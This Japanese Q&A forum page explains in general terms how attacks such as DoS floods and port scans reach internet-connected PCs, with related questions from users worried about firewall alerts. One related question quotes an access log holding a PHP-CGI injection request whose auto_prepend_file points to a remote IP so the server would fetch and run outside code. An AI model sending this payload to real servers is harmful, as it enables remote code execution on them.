- ベストアンサー
なぜ攻撃できるのですか?
前から疑問だったのですが、いわゆる攻撃ツールってありますよね。よく知らないのですがあれは相手のIPアドレスめがけて攻撃するわけですよね。そこで質問なのですが、なぜそんなことが、どういう原理でできるのでしょうか?普通ネットをする時にURLを自分で打ち込んで送信してHPを見る、つまり自ら情報を要求してその情報を自分のパソコンにダウンロードするということならわかるのですが、要求もしていないのになぜ攻撃できるのかがわかりません。 お願いします。 ※別にそんなことをしようとしているのではありませんの。単純に疑問に思っただけです。
- jimihenn
- お礼率47% (147/308)
- ネットワーク
- 回答数8
- ありがとう数2
- みんなの回答 (8)
- 専門家の回答
質問者が選んだベストアンサー
(質問と回答にずれを感じたので・・・) あなたが自分のコンピュータをインターネットに接続している間は、あなたが他のコンピュータからデータをもらえるように、他のコンピュータからもあなたのコンピュータからデータをもらおうとすることができます。 インターネットに接続している間は、あなたのコンピュータはインターネットの中にあります。他のコンピュータからアクセスできます。 その際、ちょっと特殊な要求をあなたのコンピュータに送ると、何かあなたが望まないことができてしまう・・・そういう攻撃もあります。 Nimda など、ウイルスによるものである場合は全て自動的に行われるので、無統制でそこに理由はありません。 ただ攻撃ツールの場合は基本的には24時間つながりっぱなしのコンピュータが攻撃の対象になることが多いと思いますが。
その他の回答 (7)
- popesyu
- ベストアンサー率36% (1782/4883)
既に回答が出ていますが 要求=攻撃です。 例えば、普通に掲示板に書き込みをすることは簡単に出来ます。でこれを連続して行えば連続書き込みになりますよね。するとアラシとか呼ばれたりします。 ま最近は普通にPINGを複数打つだけでは攻撃にはならないんですけども。対策もされてますので。上記の掲示板の例でも相手が個人であればそれなりに対策できます。 そのためDDoS攻撃と呼ばれるように複数のパソコンから同時に同一のターゲットにアタックするというのが最近の主流です(イメージ的にはコンサートチケットの予約時の電話回線でも想像して下さい)。しかもこれはタチの悪いことに攻撃している人にその自覚がないことです。 セキュリティが無防備なサーバーなどを乗っ取り、乗っ取られたパソコンがまた別のサーバーを乗っ取り、ねずみ算式に増えていったパソコンが同じターゲットに要求を出すというものです。 これには今のところ対抗策はありません。サーバー管理者が普通のセキュリティ対策をすれば十分なんですが、そういうことを言い出すと、全ての人が交通法規を守れば、交通事故はこの世からなくなりますもんね。
- honiyon
- ベストアンサー率37% (331/872)
こんにちは、honiyonです。 住所さえ分かれば、家の前まで行く事は誰でも出来る事です。 それと同じ事で、住所(IPアドレス)が分かれば誰でも相手にアクセス可能です。 住所(IPアドレス)の調べ方ですがいくつか方法はあります。 1.自分のサイトにアクセスした人のIPアドレスを収集する。 2.IPアドレスが公開される掲示板。 3.任意の相手のIPアドレスを表示するようなコミュニケーションツール。 (例.ICQは相手が許可していればその人のIPアドレスが表示される。 4.その他いろいろ これで相手の家の前に立つことは可能です。 さて、次にアクセスの方法ですが、これも色々ありますね。 1.チャイムを鳴らす 2.鍵のピッキング 3.窓を破って進入 4.その他いろいろ 攻撃にはいくつも種類がありますが、最も単純で有名な攻撃は DOS攻撃ですね。 簡単に説明します。 これは1の方法を使います。 通常はピンポーンと一回だけならしますが、これを何度も鳴らします。 インターネットでは、一回鳴らされたら必ず応答しなくてはなりません。つまり、何度も鳴らされたらそのたびに返事をせねばならず、ヘロヘロになってしまうという攻撃です。 もっと簡単に言うと「アクセスが集中してコンピュータがダウン、もしくは回線がパンクして動作が非常に重くなる。(例.Webページを見たいと思ってもなかなかアクセス出来ない)」となります。 参考になれば幸いです(..
- JOYBOX
- ベストアンサー率52% (75/143)
ITPro ニュース:不正侵入を助長するクラッキング・ツールの脅威,エフ・セキュアのCTOが手口を解説 http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20011111/1/ を見て下さい。 コンピュータの世界では、HPを巡回してメールアドレスを自動で抜き取ることが出来るソフトは良く知られていますね、それと同じようにHP以外でもインターネットに繋がっている状態のPCを巡回して見つけだし、セキュリティホールがあるPCやファイアウオールを導入していない無防備なPCを見つけだすツールがあってもおかしくはありません。
- Pesuko
- ベストアンサー率30% (2017/6702)
誰のPCでも出来る「PING」もちろんあなたのPCでも。 相手のIPアドレスを入れれば存在してるかどうか返事が返ってくる。 次にアタックツール(ネット上で無数にDLできる)を使って存在するPINGで返事のあったIPアドレスをセットすると、そのPCの空いているポート(入り口)を自動検索します(ポートスキャン) 入り口が見つかればその入り口から出来ることを実行する。 自ら情報を要求=相手のサーバーのIPアドレスにHTTPポート(入り口)に対して要求信号を送信してますよね。 あなたの言う「自ら情報を要求」自体が攻撃と大して違いがないのです。
- yamakasi
- ベストアンサー率0% (0/4)
こんにちは! ZDNetのHelpdeskページにその辺のことが 詳しくわかりやすく解説されていますので、 ご参考まで...
- juna
- ベストアンサー率42% (8/19)
>普通ネットをする時にURLを自分で打ち込んで送信してHPを見る、 >つまり自ら情報を要求してその情報を自分のパソコンにダウンロードするということならわかるのですが、 >要求もしていないのになぜ攻撃できるのかがわかりません。 それでは"サーバ"は要求していませんがなぜ"サーバ"から"ダウンロード"できるのですか 基本的には同じことです The Internet(いわゆるインターネット)はパソコン通信とは異なり水平分散型のネットワークです #ちなみに"ダウンロード"は上記の意味で本来は誤用です.
なんでしょうかね? ただたんに自分がパソコンに詳しいって ことを証明したいだけですかね? といってもその攻撃ツールをその人が開発したわけでもないし、 セキュリティーホールを自分で見つけたわけでもなし、 ただたんにそのソフトやその方法 を使いこなせるということを 証明したいだけではないのでしょうか? ウィンニューク、コンコンアタック、ピング等、 簡単に書くと多量の信号や読み込めない信号を 相手に読ませて遅くさせるってことですかね? 上記のは今使っても利き目ないと思いますけど、 私はスキルがまったくありませんので 詳しいことはわかりませんが同じ疑問を持ってます。
関連するQ&A
- 攻撃されているログの見方
初めまして。ネットワーク管理初心者のものです。 最近あるIPアドレスから頻繁にアクセスがあります。 プロトコルはUDPで、送信先が161です。 UDPの161とは、snmpだと調べましたが、このツールがなんなのか、 一体何をしに、何のために自分へアクセスしているのかがわかりません。 ただ、毎日かなりの回数のアクセスログがあり、気になってはいます。 自分のパソコンは誰かから攻撃されているのでしょうか? 全然知識がないため、ただログを見ていることしかできません。 どなたか詳しい方、教えて下さい。
- ベストアンサー
- ネットワーク
- 攻撃者が自分!?
最近トロイの木馬に攻撃されたのですが、攻撃者のIPアドレスをみると自分のIPアドレスなのです・・これは偽造なんでしょうか?専門の人に診断していただく予定なのですが、どうしても気になってそれまで待てません。どうぞよろしくお願い致します。
- 締切済み
- ウィルス・マルウェア
- 攻撃を受けた場合どうしていますか?
ノートンのインターネットセキュリティを使っている者なのですが、最近、攻撃が激しく、ほぼ毎日のように警告表示が出ます。(以前は月1回位有るか無いかだったんですが・・・) ノートンのログを見ると、相手のIPアドレスと攻撃ツール等が書いてあるのですが、このログを何処かの調査機関に提出するなど、対応することは出来るでしょうか。
- ベストアンサー
- ネットワーク
- まだしつこく攻撃してくるのですが・・・
前投稿したのですが、まだしつこくハッカーが攻撃してきます。マカフィーで全部ブロックされているのですが、ブロックされれば個人情報とかは漏れることはないのですか? 前PCゲームで通信対戦ができないため、IPとかをいじくっていて、そのときにファイヤーウォールとかも一端全部切ってしまったのですが・・・。 ポートの開放やIPアドレスを固定したのも何か関係があるのですか?詳しい方よろしくお願いします。
- ベストアンサー
- スパイウェア
- これってサイバー攻撃でしょうか?
私が運営するWebサイト(www.example.comとします)に、以下のようなアクセスログが残っていました。 www.example.com/?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://61.19.253.26/echo.txt 最後のIPアドレス「61.19.253.26」を調べると、タイ国のもののようですが、使用されていないようです。 これってサイバー攻撃の一種なのでしょうか? 何かしらの情報が盗まれたりした痕跡なのでしょうか? 自分で、ブラウザに上記URLを打ち込んだのですが、反応がありませんでした。 ちなみに、私のサイトはレンタルの共有サーバーで運用しています。 また、全てPHPで作成しており、ルートのindex.phpにパラメータを与えることで、全てのページを表示させるようにしています。 なお、index.phpとcssや画像以外は非公開ディレクトリに置いています。 また、同一契約で上記と同じ公開ディレクトリに複数のWebサイトを作っています。 盗まれたものは取り返せないので仕方がないのですが、危険な攻撃であればセキュリティを高める手段を講じる必要があると感じています。 上記アクセスで何が行われたのか、どのような危険があるのか、ご存じの方がいらっしゃいましたらご教授いただければ幸いです。 よろしくお願いいたします。
- ベストアンサー
- ネットワーク
- 同じ攻撃を毎日受けます…
McAfeeのFirewallを使っています。 先日から、192.168.0.7にあるコンピュータからまったく同じ攻撃を4度も受けているようです。 幸い、Firewallが作動し被害は出ていないようですが、毎日同じ攻撃されるので気持ち悪く感じています。 放っておいて大丈夫でしょうか? もし、何かやっておくべき対策がありましたらご教授下さい。 (なお、パソコンはメール・ワード資料作成・インターネット接続にしか使っていません。) ************************************ IP アドレス 192.168.0.7 にあるコンピュータが、ユーザのコンピュータ上の UDP ポート 137 に対して要求されていない接続を試みました。 UDP ポート 137 は、通常は "NETBIOS Name" サービスまたはプログラムによって使用されます。
- ベストアンサー
- ウィルス・マルウェア
- 別のPCから攻撃を受ける、とはどういう意味でしょうか?
PCにはノートンが入っていますが、 「別のPCから攻撃を受けたので機能を 一時的にカットします」、といったような メッセージがあり、レポートを表示すると IPアドレスと発信場所と思われる所が表示されました。 この「攻撃」を受けるとはどういう意味なのか、 またノートンは「攻撃の起点と思われるドメインまたはネットワークの、PCの位置を含む情報を発見しました。」とデータを表示しますがデータの見方がわかりません。 ノートンはこれに対し対策はいらないようなことを 表示しますが実際どうでしょうか。 どなたかわかる方回答お願いします。
- ベストアンサー
- ウィルス・マルウェア
- 攻撃者にターゲッティングされた場合…
Twitterやブログによくある短縮URL先のウェブページに埋め込まれた攻撃コードによって、PCが半ば乗っ取られた後について質問します。 1.何か仕込まれていると思い、プロバイダの変更手続きを行ってからPCとルータをリストア・リセットし、書類が届いてから新規にセットアップをするが、IPアドレスの枯渇によってプロバイダにぶら下がっている世帯PCのIPアドレスは変わらないと言ってもいいぐらいなので、「この住所、このプロバイダなら、ここのIPアドレスの範囲に繋がるはず。書類到着日を予想して空いているIPアドレスを定期ノックして反応があれば、即座にアタックを仕掛け」て成功させる事は可能でしょうか? 2.(pingとかになるのでしょうか)ノックをした際の返事の具合で、何のルータを使って接続しているか特定は可能でしょうか? 地元の、またはDTIのプロバイダから配布されているIPアドレスがONU・ルータの電源を24時間切っていても変更されることが無かったため、プロバイダを乗り換えた事があるのですが…やりすぎでしょうか?考えすぎだとは思いますが、もしネット経由で攻撃者に付きまとわれた場合、どんな対策を練って、そして実行するのがベストなのか教えてほしいです。
- ベストアンサー
- ネットワーク
- [Error][アラームログ] DoS攻撃
HG8045QにNetgearのルーターをブリッジーモードで接続しています。接続機器が多いのと、HG8045Qの設置場所から離れた2階で有線接続する必要もあるためです。(ちなみに、HG8045Qの接続場所は、設置業者の人から「ここしかないですね」と言われてしまったので不本意ながら1階になっています) ある日、HG8045Qの[ログ]を見てみると、以下のようなエラーが記録されていました。 [Error][アラームログ] アラームID:303500,アラームレベル:エラー,DoS攻撃 種別:smurf 送信元IPアドレス:***.***.***.*** 宛先IPアドレス:255.255.255.255 送信元MACアドレス:10-0c-6b-ec-27-5a これは、毎日ほぼ同時刻に1回記録されています。 気味が悪いので、[送信元MACアドレス:10-0c-6b-ec-27-5a]このMACアドレスが誰のものかを、https://uic.jp/mac/ で調べました。 結果、[Vendor name: NETGEAR]とのこと。 つまり、HG8045Qにブリッジーモードで接続したルーターから、毎日1回、DoS攻撃と判断されるアクセスが行われているということです。 ここで質問なのですが、以上のことから、 1)Netgearから[DoS攻撃]を受けている。 2)Netgearのルーター経由で、誰かから[DoS攻撃]を受けている。 3)何らかの信号はあるものの、攻撃では無く、HG8045Qの勘違い。 4)その他 どれに該当するでしょうか。 情報が少なくてすみません。現状わかる範囲のことは記載致しました。 他に確認すべきこと、その方法などがありましたらそれもご教示願えますと幸いです。 以上、宜しくお願い致します。 ※OKWAVEより補足:「So-netの各種設定」についての質問です。
- ベストアンサー
- Wi-Fi・無線LAN
- インターネット通信不能攻撃への対策
ネットにつなぐ時もし攻撃者が僕が毎日10:00にモデムに電源をいれ プロバイダーからIPアドレスを振ってもらうタイミングがわかるとします。そして時々僕のところに除きに来て通信先もわかるとして、そこからIPアドレスをパケットを盗聴して僕のIPアドレスは完全に特定できるとして、IPアドレスの変更は無駄なこととして聞いてください。 僕のIPアドレスがばれているので通信先がわかり訪れたサイトのIPアドレスに成りすましTCPパケットを連続で打ってきます。 これはパーソナルファイアウォールのTCPのインバウンド拒否で防げますが、迷惑なのが 通信できないようにしてくることです。 僕のIPアドレスに成りすましてFIN、RSTパケットを送って通信を終わらせてるのか 通信先のIPアドレスに成りすまして僕のほうにFIN、RSTパケットを送ってきて終わらせてるのか そういうの詳しくないんですけど そういうのができると本気を出せば一日中強制的に通信不能にできることもできますよね? IPアドレスが偽装されてるのでどう相手を特定したらいいんですか? またjeticoというPFWがありますがこれはTCPのFIN,SYN,RSTなどフラグ別にまで制御できますが、これでインバウンドのRST,FINを遮断すれば解決できませんか?(それではぼくのIPアドレスに偽装して通信先にFIN、RSTパケットを送る遮断攻撃対策になってませんが) どうすれば遮断攻撃を回避できますか?
- 締切済み
- スパイウェア
